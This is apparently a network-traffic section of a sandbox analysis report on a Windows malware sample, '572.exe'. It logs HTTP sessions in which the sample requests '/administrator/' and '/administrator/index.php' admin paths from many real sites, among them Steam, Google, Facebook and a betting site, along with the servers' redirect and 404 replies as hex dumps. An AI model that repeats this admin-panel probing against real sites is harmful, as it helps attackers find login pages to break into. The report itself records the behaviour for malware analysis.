                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.670398951 CET97INData Raw: 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                142192.168.2.654981184.25.164.10380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.392215014 CET186OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.570204973 CET351INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.178834915 CET195OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.357201099 CET360INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                143192.168.2.654965104.21.85.9580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.394535065 CET177OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: v.xsanime.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.521079063 CET669INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://v.xsanime.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DaX0OiNBqp%2B61XmKPRKf%2BGEAo06WNkW6IANeo9Al7NeXzUapedPHdpi9vIqSAmTGMh%2Fc8b6FzkbIPhLHY7kbsesEb9BaMWny9AWlg1ssgU6UASGt%2FHMrCdAuAYXRvYk9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb694c8eb02c-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.176841974 CET186OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: v.xsanime.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.302222967 CET682INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://v.xsanime.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FPCdrO%2F0F0rdsPSqv%2BWchphg%2BDrLWcAxNEjNxiqdPVieTA9YJ5U5KwAnOZXPme3HyXknzQYqTUeAOc8e%2BD4H3TSHwfQL%2BZoK9MfG9sXd7oh2NtEMrBxpN2z2S5DmYGxt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd42efb5b02c-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                144192.168.2.654982142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.395360947 CET183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.521095037 CET488INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.521110058 CET185INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 b0 35 d6 82 22 48 0e ed 31 68 30 82 71 25 89 85 fe 7d 63 da 63 e7 b2 ec ec 30 bc a5 95 68 6a 96 d0 8a e7 45 18 e2 2e 6a ce 1a 78 a9 01 09 65 56 b0 d2 4e f3 9b 92 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EH5"H1h0q%}cc0hjE.jxeVN!]nn({Dh7tQ2}]:J{0DfZ&`fZYEIE,u
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.291250944 CET192OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.411828995 CET497INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 192
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.411849976 CET192INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 7b 2d 31 a0 35 d6 82 22 48 0e ed 31 c4 60 02 c6 48 8c a5 fd fb 6a da 63 e7 b2 ec ec 30 bc 25 15 6f 6a 9a 90 8a 65 c5 36 f8 8d d7 8c 36 ee a9 7a c0 95 9d 9d 17 de 8c 6f 82 bf
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHI{-15"H1`Hjc0%oje66zo_0on(8m=Fms\b6H)!c![aTH:EodEpW/4R"8h##qe


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                145192.168.2.6549803.141.96.5380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.408878088 CET177OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.531687021 CET152INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/administrator/
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                146192.168.2.65498345.60.0.4480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.410065889 CET179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.755603075 CET963INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.codere.com.co/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 161
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: visid_incap_2786379=7QC+lUlNToGXKQhFEhKNVCrDwGUAAAAAQUIPAAAAAABoY1sRlcvFLFRpAIbEpOgZ; expires=Tue, 04 Feb 2025 10:21:08 GMT; HttpOnly; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: nlbi_2786379=jaZYOz0iyxXl6zibaJQkpgAAAABWyDh9KaHbPtBvXejIdDEA; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: incap_ses_1816_2786379=xCiSFMx9XlQPHxA+arozGSrDwGUAAAAAfL7s04dQA8ZJXhS3hRJ27Q==; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 5-35831516-35831517 NNNN CT(118 -1 0) RT(1707131690203 0) q(0 0 1 1) r(2 2) U24
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 63 6f 64 65 72 65 2e 63 6f 6d 2e 63 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://m.codere.com.co/administrator/">here</a></body>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.183393955 CET426OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: incap_ses_1816_2786379=xCiSFMx9XlQPHxA+arozGSrDwGUAAAAAfL7s04dQA8ZJXhS3hRJ27Q==; visid_incap_2786379=7QC+lUlNToGXKQhFEhKNVCrDwGUAAAAAQUIPAAAAAABoY1sRlcvFLFRpAIbEpOgZ; nlbi_2786379=jaZYOz0iyxXl6zibaJQkpgAAAABWyDh9KaHbPtBvXejIdDEA
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.405647039 CET578INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.codere.com.co/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 170
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 5-35831516-35835161 NNNY CT(118 -1 0) RT(1707131690203 75773) q(0 0 0 -1) r(1 1) U24
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 63 6f 64 65 72 65 2e 63 6f 6d 2e 63 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://m.codere.com.co/administrator/index.php">here</a></body>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                147192.168.2.65500431.13.88.180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.456953049 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.558765888 CET216INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://hi-in.facebook.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
